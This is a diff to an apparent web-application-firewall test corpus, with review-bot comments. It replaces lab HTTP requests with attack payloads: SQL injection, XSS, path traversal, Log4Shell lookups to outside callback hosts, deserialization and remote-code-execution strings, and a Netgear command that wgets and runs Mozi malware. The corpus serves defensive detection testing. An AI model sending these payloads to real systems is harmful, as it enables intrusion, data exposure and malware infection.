--- a/testcases/4a/16/3e3624055a6de89cc8ea750df30a.black
+++ b/testcases/4a/16/3e3624055a6de89cc8ea750df30a.black
@@ -1,9 +1,8 @@
-GET /vulnerabilities/sqli/?id=&Submit=Submit HTTP/1.1
+GET /SAAS/t/_/;/WEB-INF/web.xml HTTP/1.1
 Host: 10.10.3.128:2280
 Upgrade-Insecure-Requests: 1
 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
-Referer: http://10.10.3.128:2280/vulnerabilities/sqli/?id=SELECT+CASE+WHEN+%28YOUR-CONDITION-HERE%29+THEN+1%2F0+ELSE+NULL+END&Submit=Submit
 Accept-Encoding: gzip, deflate
 Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
 Connection: close
diff --git a/testcases/4b/0a/096825fe5d589a0fe75c44aca53e.black b/testcases/4b/0a/096825fe5d589a0fe75c44aca53e.black
index 38456ef72..66d95c9ed 100644
--- a/testcases/4b/0a/096825fe5d589a0fe75c44aca53e.black
+++ b/testcases/4b/0a/096825fe5d589a0fe75c44aca53e.black
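Review bot: The request line written into 49/e6 is byte-for-byte the same `appno=0+union+select+43512*43017,1--+` request that this commit also writes into 4c/17, so the corpus now carries the sample twice. From the visible context the two files differ only in their headers (`Host: 10.10.3.128` with `Pragma`/`Cache-Control` here, `Host: 10.10.3.128:2280` in 4c/17). Duplicate payloads count double in any detection-rate figure computed over the corpus; keep one, or note in the corpus index that the pair exists to exercise header variation.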
@@ -1,9 +1,8 @@
-GET /vulnerabilities/sqli/?id=&Submit=Submit HTTP/1.1
+GET /mailsms/s?func=ADMIN:appState&dumpConfig=/ HTTP/1.1
 Host: 10.10.3.128:2280
 Upgrade-Insecure-Requests: 1
 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
-Referer: http://10.10.3.128:2280/vulnerabilities/sqli/?id=SELECT+CASE+WHEN+%28YOUR-CONDITION-HERE%29+THEN+TO_CHAR%281%2F0%29+ELSE+NULL+END+FROM+dual&Submit=Submit
 Accept-Encoding: gzip, deflate
 Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
 Connection: close
diff --git a/testcases/4c/17/7df1958bcdf0ea105e4d1f3bcf99.black b/testcases/4c/17/7df1958bcdf0ea105e4d1f3bcf99.black
index a2e4eb672..0b38185d7 100644
--- a/testcases/4c/17/7df1958bcdf0ea105e4d1f3bcf99.black
+++ b/testcases/4c/17/7df1958bcdf0ea105e4d1f3bcf99.black
@@ -1,9 +1,8 @@
-GET /vulnerabilities/xss_r/?name= HTTP/1.1
+GET /admin/?a=doSearchParameter&appno=0+union+select+43512*43017,1--+&c=language_general&editor=cn&n=language&site=admin&word=search HTTP/1.1
 Host: 10.10.3.128:2280
 Upgrade-Insecure-Requests: 1
 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
-Referer: http://10.10.3.128:2280/vulnerabilities/xss_r/?name=frames%5B%28%2B%7B%7D%2B%5B%5D%29%5B%2B%21%21%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%21%5B%5D%5D%2B%28%5B%5D%5B%5B%5D%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%21%5B%5D%2B%21%21%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%21%21%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%28%28%2B%7B%7D%2B%5B%5D%29%5B%2B%21%21%5B%5D%5D%29%3B%2F%2F
 Accept-Encoding: gzip, deflate
 Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
 Connection: close
diff --git a/testcases/4c/76/df11ca5bc3ffc1609e3ffecffcce.black b/testcases/4c/76/df11ca5bc3ffc1609e3ffecffcce.black
index 8db2b35f5..b5c81fa56 100644
--- a/testcases/4c/76/df11ca5bc3ffc1609e3ffecffcce.black
+++ b/testcases/4c/76/df11ca5bc3ffc1609e3ffecffcce.black
@@ -1,9 +1,8 @@
-GET /vulnerabilities/xss_r/?name= HTTP/1.1
+GET /common/download/resource?resource=/profile/../../../../Windows/win.ini HTTP/1.1
 Host: 10.10.3.128:2280
 Upgrade-Insecure-Requests: 1
 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
-Referer: http://10.10.3.128:2280/vulnerabilities/xss_r/?name=constructor.constructor%28%27alert%281%29%27%29%28%29
 Accept-Encoding: gzip, deflate
 Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
 Connection: close
diff --git a/testcases/4f/7f/c352b5295ad70d7c460cb2d1c320.black b/testcases/4f/7f/c352b5295ad70d7c460cb2d1c320.black index c7b9be466..83b85e162 100644 --- a/testcases/4f/7f/c352b5295ad70d7c460cb2d1c320.black +++ b/testcases/4f/7f/c352b5295ad70d7c460cb2d1c320.black @@ -1,10 +1,11 @@ -GET /vulnerabilities/xss_r/?name= HTTP/1.1 +POST /vulnerabilities/xss_r/?name= HTTP/1.1 Host: 10.10.3.128:2280 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 -Referer: http://10.10.3.128:2280/vulnerabilities/xss_r/?name=eyJpZCI6IjEgYW5kIDE9MSJ9 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 Connection: close +{"AppId": "aaaa'|curl acs.azlvnac6.xaliyun.com|'", "Time": "2020/1/1 1:1:1"} + diff --git a/testcases/54/f6/bca6cc8a95429592ce2e9bc79fe6.black b/testcases/54/f6/bca6cc8a95429592ce2e9bc79fe6.black index 415017d07..98be81839 100644 --- a/testcases/54/f6/bca6cc8a95429592ce2e9bc79fe6.black +++ b/testcases/54/f6/bca6cc8a95429592ce2e9bc79fe6.black @@ -1,4 +1,4 @@ -GET /vulnerabilities/sqli/?id=&Submit=Submit HTTP/1.1 +GET /?doAs=%60ping%20acs.14z6oc22.xaliyun.com%60 HTTP/1.1 Host: 10.10.3.128:2280 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 diff --git a/testcases/56/eb/03a4fddffaf7c3958d0700025acb.black b/testcases/56/eb/03a4fddffaf7c3958d0700025acb.black index 4ce16e636..2618da588 100644 --- a/testcases/56/eb/03a4fddffaf7c3958d0700025acb.black +++ b/testcases/56/eb/03a4fddffaf7c3958d0700025acb.black 
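Review bot: The 4f/7f case becomes a `POST` with a JSON body, but no `Content-Length` or `Content-Type` header is added, so a parser that frames the message from its headers sees a request with no body and the JSON line may never reach the rule under test. Add `Content-Type: application/json` and a `Content-Length` that matches the body, unless the replay harness is known to compute them. The body here and the `doAs` value written into 54/f6 also name hosts under `xaliyun.com`; if the project does not control that domain, replaying the corpus against a vulnerable target would send lookups to a third party, so a reserved name such as `callback.example.invalid` is the safer fixture.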
@@ -1,9 +1,8 @@
-GET /vulnerabilities/xss_r/?name= HTTP/1.1
+GET /%0D%0D%0A%0AX-Pen-Test%3Ad0ni8QyNnI HTTP/1.1
 Host: 10.10.3.128:2280
 Upgrade-Insecure-Requests: 1
 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
-Referer: http://10.10.3.128:2280/vulnerabilities/xss_r/?name=window%5B%27%5Cx61%5Cx6c%5Cx65%5Cx72%5Cx74%27%5D%28window%5B%27%5Cx64%5Cx6f%5Cx63%5Cx75%5Cx6d%5Cx65%5Cx6e%5Cx74%27%5D%5B%27%5Cx64%5Cx6f%5Cx6d%5Cx61%5Cx69%5Cx6e%27%5D%29%3B%2F%2F
 Accept-Encoding: gzip, deflate
 Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
 Connection: close
diff --git a/testcases/5b/0d/13f7d5f4c37d750a1e23b19a9cb8.black b/testcases/5b/0d/13f7d5f4c37d750a1e23b19a9cb8.black
index 2c57f5b45..d02a69d00 100644
--- a/testcases/5b/0d/13f7d5f4c37d750a1e23b19a9cb8.black
+++ b/testcases/5b/0d/13f7d5f4c37d750a1e23b19a9cb8.black
@@ -1,9 +1,8 @@
-GET /vulnerabilities/xss_r/?name= HTTP/1.1
+GET /login/index.php?login=$(ping${IFS}-nc${IFS}2${IFS}`whoami`.) HTTP/1.1
 Host: 10.10.3.128:2280
 Upgrade-Insecure-Requests: 1
 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
-Referer: http://10.10.3.128:2280/vulnerabilities/xss_r/?name=self%5B%2Fal%2F.source%2B%2Fert%2F.source%5D%28%2FXSS%2F.source%29%3B%2F%2F
 Accept-Encoding: gzip, deflate
 Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
 Connection: close
diff --git a/testcases/5b/36/bf087c5bf71d51228b4ab5916127.black b/testcases/5b/36/bf087c5bf71d51228b4ab5916127.black
index c007a584d..dcd6940a6 100644
--- a/testcases/5b/36/bf087c5bf71d51228b4ab5916127.black
+++ b/testcases/5b/36/bf087c5bf71d51228b4ab5916127.black
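Review bot: The new request line in 5b/0d ends in `.)` with nothing between the dot and the closing parenthesis, which looks like a host placeholder that expanded to an empty string when the sample was generated, so the stored request is probably not what the generator intended. The target also carries raw `{`, `}` and backtick characters, which some servers and proxies reject with a 400 before an inspection layer sees the request, so a "blocked" result for this case may not come from the rule it is meant to exercise. If the empty host is deliberate, record that in the corpus notes; otherwise regenerate the sample with a reserved placeholder host.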
@@ -1,9 +1,8 @@
-GET /vulnerabilities/xss_r/?name= HTTP/1.1
+GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.1
 Host: 10.10.3.128:2280
 Upgrade-Insecure-Requests: 1
 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
-Referer: http://10.10.3.128:2280/vulnerabilities/xss_r/?name=globalThis%5B%2F*foo*%2F%27alert%27%2F*bar*%2F%5D%28globalThis%5B%2F*foo*%2F%27document%27%2F*bar*%2F%5D%5B%27domain%27%5D%29%3B%2F%2F
 Accept-Encoding: gzip, deflate
 Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
 Connection: close
diff --git a/testcases/62/8b/6fdbc0419d53197dc0c7d336adb3.black b/testcases/62/8b/6fdbc0419d53197dc0c7d336adb3.black
index 761549765..f931fe9cd 100644
--- a/testcases/62/8b/6fdbc0419d53197dc0c7d336adb3.black
+++ b/testcases/62/8b/6fdbc0419d53197dc0c7d336adb3.black
@@ -1,9 +1,8 @@
-GET /vulnerabilities/xss_r/?name= HTTP/1.1
+GET /%24%7Bjndi%3Aldap%3A//127.0.0.1 HTTP/1.1
 Host: 10.10.3.128:2280
 Upgrade-Insecure-Requests: 1
 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
-Referer: http://10.10.3.128:2280/vulnerabilities/xss_r/?name=globalThis%5B%27%5Cx65%5Cx76%5Cx61%5Cx6c%27%5D%28%27globalThis%5B%22%5Cx61%5Cx6c%5Cx65%5Cx72%5Cx74%22%5D%28globalThis%5B%22%5Cx61%5Cx74%5Cx6f%5Cx62%22%5D%28%22WFNT%22%29%29%27%29%3B%2F%2F
 Accept-Encoding: gzip, deflate
 Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
 Connection: close
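Review bot: The new request line in `testcases/5b/36/bf087c5bf71d51228b4ab5916127.black` ends in `&curpath=/¤tsetting.htm=1`, which looks like `&currentsetting.htm=1` after an HTML-entity decode turned `&curren` into `¤`. If the file on disk really holds `¤`, the sample has lost a parameter separator and carries a non-ASCII character whose bytes on the wire depend on the file's encoding, so a detection rule tested against it is not seeing the request shape it was taken from. I would restore the tail to `&curpath=/&currentsetting.htm=1 HTTP/1.1`. If the character is only an artifact of how this page was rendered, no change is needed.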
diff --git a/testcases/62/ce/3f16216c912115c6e4c52028f0b2.black b/testcases/62/ce/3f16216c912115c6e4c52028f0b2.black
index 467d436da..497d670de 100644
--- a/testcases/62/ce/3f16216c912115c6e4c52028f0b2.black
+++ b/testcases/62/ce/3f16216c912115c6e4c52028f0b2.black
@@ -1,9 +1,8 @@
-GET /vulnerabilities/xss_r/?name= HTTP/1.1
+GET /cgi-bin/php5?-d+allow_url_include%3Don+-d+safe_mode%3Doff+-d+suhosin.simulation%3Don+-d+disable_functions%3D%22%22+-d+open_basedir%3Dnone+-d+auto_prepend_file%3Dphp%3A%2F%2Finput+-d+cgi.force_redirect%3D0+-d+cgi.redirect_status_env%3D0+-n HTTP/1.1
 Host: 10.10.3.128:2280
 Upgrade-Insecure-Requests: 1
 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
-Referer: http://10.10.3.128:2280/vulnerabilities/xss_r/?name=window%5B%28%2B%7B%7D%2B%5B%5D%29%5B%2B%21%21%5B%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%21%5B%5D%5D%2B%28%5B%5D%5B%5B%5D%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%21%5B%5D%2B%21%21%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%21%21%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%28%28%2B%7B%7D%2B%5B%5D%29%5B%2B%21%21%5B%5D%5D%29%3B%2F%2F+Jump+to+the+codeWorks+in+Chrome+Works+in+Firefox+Works+in+Safari
 Accept-Encoding: gzip, deflate
 Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
 Connection: close
diff --git a/testcases/66/18/5ac9a920da0f30620d2b7f74ca95.black b/testcases/66/18/5ac9a920da0f30620d2b7f74ca95.black
index 1f1fc4f85..f7bd9726b 100644
--- a/testcases/66/18/5ac9a920da0f30620d2b7f74ca95.black
+++ b/testcases/66/18/5ac9a920da0f30620d2b7f74ca95.black
@@ -1,9 +1,8 @@
-GET /vulnerabilities/xss_r/?name= HTTP/1.1
+GET /tag_test_action.php?partcode={dede:field%20name=%27source%27%20runphp=%27yes%27}echo%20md52064567660{/dede:field}&token&url=a HTTP/1.1
 Host: 10.10.3.128:2280
 Upgrade-Insecure-Requests: 1
 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
-Referer: http://10.10.3.128:2280/vulnerabilities/xss_r/?name=this%5B%2F*foo*%2F%27alert%27%2F*bar*%2F%5D%28this%5B%2F*foo*%2F%27document%27%2F*bar*%2F%5D%5B%27domain%27%5D%29%3B%2F%2F
 Accept-Encoding: gzip, deflate
 Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
 Connection: close
diff --git a/testcases/68/4a/3957912d5632b76f0fedc641a765.black b/testcases/68/4a/3957912d5632b76f0fedc641a765.black
index 9f777e32e..79392bf1d 100644
--- a/testcases/68/4a/3957912d5632b76f0fedc641a765.black
+++ b/testcases/68/4a/3957912d5632b76f0fedc641a765.black
@@ -1,9 +1,8 @@
-GET /vulnerabilities/xss_r/?name= HTTP/1.1
+GET /a?x=%24%7Bjndi%3Adns%3A//%24%7BhostName%7D.hgetinfo.acs.ogru1vfl.xaliyun.com%7D HTTP/1.1
 Host: 10.10.3.128:2280
 Upgrade-Insecure-Requests: 1
 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
-Referer: http://10.10.3.128:2280/vulnerabilities/xss_r/?name=window%5B%27%5C141%5C154%5C145%5C162%5C164%27%5D%28%27%5C130%5C123%5C123%27%29%3B%2F%2F
 Accept-Encoding: gzip, deflate
 Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
 Connection: close
diff --git a/testcases/6c/4d/0375d8a186fdf7218486e5815314.black b/testcases/6c/4d/0375d8a186fdf7218486e5815314.black
index ad5e16bea..d86e41e5f 100644
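Review bot: The added request line in `testcases/68/4a/3957912d5632b76f0fedc641a765.black` embeds a concrete external callback host, `hgetinfo.acs.ogru1vfl.xaliyun.com`, inside a `${jndi:dns://${hostName}...}` lookup, and nothing in the diff indicates the project controls that domain. If this corpus is ever replayed against a target that does evaluate the lookup, the target's hostname leaves the test environment in a DNS query to a third party. The same concern applies to `47.104.188.110:7888@acs.qcz84ien.xaliyun.com` in `testcases/76/e2/81a1f4a640ebfd97b990b5b02f5d.black`. A reserved name keeps the sample's shape for rule matching without that side effect, for example `.callback.example.invalid%7D` in place of the real host (constructed placeholder).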
--- a/testcases/6c/4d/0375d8a186fdf7218486e5815314.black
+++ b/testcases/6c/4d/0375d8a186fdf7218486e5815314.black
@@ -1,9 +1,8 @@
-GET /vulnerabilities/xss_r/?name= HTTP/1.1
+GET /index.php/?s=index/%5Cthink%5Capp/invokefunction&function=call_user_func&vars%5B0%5D=md5&vars%5B1%5D=20220321 HTTP/1.1
 Host: 10.10.3.128:2280
 Upgrade-Insecure-Requests: 1
 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
-Referer: http://10.10.3.128:2280/vulnerabilities/xss_r/?name=parent%5B%2Fal%2F.source%2B%2Fert%2F.source%5D%28%2FXSS%2F.source%29%3B%2F%2F
 Accept-Encoding: gzip, deflate
 Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
 Connection: close
diff --git a/testcases/6e/41/89f52e21c929f13c3f992a6717cf.black b/testcases/6e/41/89f52e21c929f13c3f992a6717cf.black
index b835ddb96..bcb1ee545 100644
--- a/testcases/6e/41/89f52e21c929f13c3f992a6717cf.black
+++ b/testcases/6e/41/89f52e21c929f13c3f992a6717cf.black
@@ -1,9 +1,8 @@ -GET /vulnerabilities/xss_r/?name= HTTP/1.1 +GET /res/login.jsf?javax.faces.ViewState=rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcAUH2sHDFmDRAwACRgAKbG9hZEZhY3RvckkACXRocmVzaG9sZHhwP0AAAAAAAAx3CAAAABAAAAABc3IADGphdmEubmV0LlVSTJYlNzYa/ORyAwAHSQAIaGFzaENvZGVJAARwb3J0TAAJYXV0aG9yaXR5dAASTGphdmEvbGFuZy9TdHJpbmc7TAAEZmlsZXEAfgADTAAEaG9zdHEAfgADTAAIcHJvdG9jb2xxAH4AA0wAA3JlZnEAfgADeHD//////////3QAAHEAfgAFcQB+AAV0AARodHRwcHh0AAdodHRwOi8veA== HTTP/1.1 Host: 10.10.3.128:2280 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 -Referer: http://10.10.3.128:2280/vulnerabilities/xss_r/?name=%3Cbase+target%3D%22alert%281%29%22%3E%3Ca+href%3D%22http%3A%2F%2Fsubdomain1.portswigger-labs.net%2Fxss%2Fxss.php%3Fcontext%3Djs_string_single%26x%3D%2527%3Beval%28name%29%2F%2F%22%3EXSS+via+target+in+base+tag%3C%2Fa%3E Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 Connection: close diff --git a/testcases/6f/cc/cc9e44429863a5c3a0962fb561b1.black b/testcases/6f/cc/cc9e44429863a5c3a0962fb561b1.black index 36f3402aa..df1b09c2f 100644 --- a/testcases/6f/cc/cc9e44429863a5c3a0962fb561b1.black +++ b/testcases/6f/cc/cc9e44429863a5c3a0962fb561b1.black 
@@ -1,9 +1,8 @@ -GET /vulnerabilities/xss_r/?name= HTTP/1.1 +GET /ajax/api/hook/decodeArguments?arguments=O%3A12%3A%22vB_dB_Result%22%3A2%3A%7Bs%3A5%3A%22%00%2A%00db%22%3BO%3A17%3A%22vB_Database_MySQL%22%3A1%3A%7Bs%3A9%3A%22functions%22%3Ba%3A1%3A%7Bs%3A11%3A%22free_result%22%3Bs%3A6%3A%22system%22%3B%7D%7Ds%3A12%3A%22%00%2A%00recordset%22%3Bs%3A52%3A%22php+-r+%22echo+md5%28qejifzqgynrucuapeorihgaxlincmnmu%29%3B%22%22%3B%7D HTTP/1.1 Host: 10.10.3.128:2280 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 -Referer: http://10.10.3.128:2280/vulnerabilities/xss_r/?name=frames%5B%27%5Cx61%5Cx6c%5Cx65%5Cx72%5Cx74%27%5D%28frames%5B%27%5Cx64%5Cx6f%5Cx63%5Cx75%5Cx6d%5Cx65%5Cx6e%5Cx74%27%5D%5B%27%5Cx64%5Cx6f%5Cx6d%5Cx61%5Cx69%5Cx6e%27%5D%29%3B%2F%2F Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 Connection: close diff --git a/testcases/70/62/5178e5d4b581e1fba17846339f87.black b/testcases/70/62/5178e5d4b581e1fba17846339f87.black index 92da44a49..d8130ee87 100644 --- a/testcases/70/62/5178e5d4b581e1fba17846339f87.black +++ b/testcases/70/62/5178e5d4b581e1fba17846339f87.black 
@@ -1,9 +1,8 @@ -GET /vulnerabilities/xss_r/?name= HTTP/1.1 +GET /?s=%ac%ed%00%05%73%72%00%1a%63%6f%6d%2e%63%74%2e%61%72%61%6c%65%69%69%2e%74%65%73%74%2e%50%65%72%73%6f%6e%00%00%00%00%00%00%00%01%02%00%08%49%00%03%61%61%61%43%00%03%63%63%63%42%00%03%64%64%64%5a%00%03%65%65%65%4a%00%03%66%66%66%46%00%03%67%67%67%44%00%03%68%68%68%4c%00%03%62%62%62%74%00%12%4c%6a%61%76%61%2f%6c%61%6e%67%2f%53%74%72%69%6e%67%3b%78%70%00%00%00%01%00%62%65%01%00%00%00%00%00%00%00%01%3f%80%00%00%40%00%00%00%00%00%00%00%74%00%03%61%61%61 HTTP/1.1 Host: 10.10.3.128:2280 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 -Referer: http://10.10.3.128:2280/vulnerabilities/xss_r/?name=parent%5B%27ale%27%2B%27rt%27%5D%28parent%5B%27doc%27%2B%27ument%27%5D%5B%27dom%27%2B%27ain%27%5D%29%3B%2F%2F Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 Connection: close diff --git a/testcases/75/36/e3b4bc5a5f270b73aa0ae99e1585.black b/testcases/75/36/e3b4bc5a5f270b73aa0ae99e1585.black index 39d6f9809..6dc952e8e 100644 --- a/testcases/75/36/e3b4bc5a5f270b73aa0ae99e1585.black +++ b/testcases/75/36/e3b4bc5a5f270b73aa0ae99e1585.black 
@@ -1,9 +1,8 @@
-GET /vulnerabilities/xss_r/?name= HTTP/1.1
+GET /error.html?templates[]=1&templateidlist=O:20:%22vB_Image_ImageMagick%22:1:{s:20:%22%00*%00imagefilelocation%22;s:13:%22/path/to/file%22;} HTTP/1.1
 Host: 10.10.3.128:2280
 Upgrade-Insecure-Requests: 1
 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
-Referer: http://10.10.3.128:2280/vulnerabilities/xss_r/?name=this%5B%27%5Cu%7B0061%7D%5Cu%7B006c%7D%5Cu%7B0065%7D%5Cu%7B0072%7D%5Cu%7B0074%7D%27%5D%28%27%5Cu%7B0058%7D%5Cu%7B0053%7D%5Cu%7B0053%7D%27%29%3B%2F%2F
 Accept-Encoding: gzip, deflate
 Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
 Connection: close
diff --git a/testcases/76/4e/a9e66c84f9f5feac22469acb7e99.black b/testcases/76/4e/a9e66c84f9f5feac22469acb7e99.black
index bee737b9c..fd23db951 100644
--- a/testcases/76/4e/a9e66c84f9f5feac22469acb7e99.black
+++ b/testcases/76/4e/a9e66c84f9f5feac22469acb7e99.black
@@ -1,9 +1,8 @@
-GET /vulnerabilities/xss_r/?name= HTTP/1.1
+GET /api/geojson?url=file:///c://windows/win.ini HTTP/1.1
 Host: 10.10.3.128:2280
 Upgrade-Insecure-Requests: 1
 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
-Referer: http://10.10.3.128:2280/vulnerabilities/xss_r/?name=%3Ca+href%3D%22+%09javascript%3Aalert%281%29%22%3EXSS%3C%2Fa%3E
 Accept-Encoding: gzip, deflate
 Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
 Connection: close
diff --git a/testcases/76/e2/81a1f4a640ebfd97b990b5b02f5d.black b/testcases/76/e2/81a1f4a640ebfd97b990b5b02f5d.black
index aa1810914..63a16c346 100644
--- a/testcases/76/e2/81a1f4a640ebfd97b990b5b02f5d.black
+++ b/testcases/76/e2/81a1f4a640ebfd97b990b5b02f5d.black
@@ -1,9 +1,8 @@
-GET /vulnerabilities/xss_r/?name= HTTP/1.1
+GET /plugins/servlet/gadgets/makeRequest?url=https://47.104.188.110:7888@acs.qcz84ien.xaliyun.com HTTP/1.1
 Host: 10.10.3.128:2280
 Upgrade-Insecure-Requests: 1
 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
-Referer: http://10.10.3.128:2280/vulnerabilities/xss_r/?name=window%5B%27ale%27%2B%27rt%27%5D%28window%5B%27doc%27%2B%27ument%27%5D%5B%27dom%27%2B%27ain%27%5D%29%3B%2F%2F
 Accept-Encoding: gzip, deflate
